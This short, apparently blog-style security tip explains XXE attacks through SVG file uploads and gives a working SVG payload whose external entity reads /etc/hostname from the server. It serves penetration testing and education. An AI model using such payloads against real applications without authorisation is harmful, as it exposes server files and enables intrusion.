XXE Via File Upload
April 04, 2022
XXE Via File Upload
The file upload functionality, opens the gateway for the XML External Entities, especially when the application accepts the file formats that support XML. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.
Try Uploading this code with .svg extension and retrieve the svg file from application to check:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/199/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>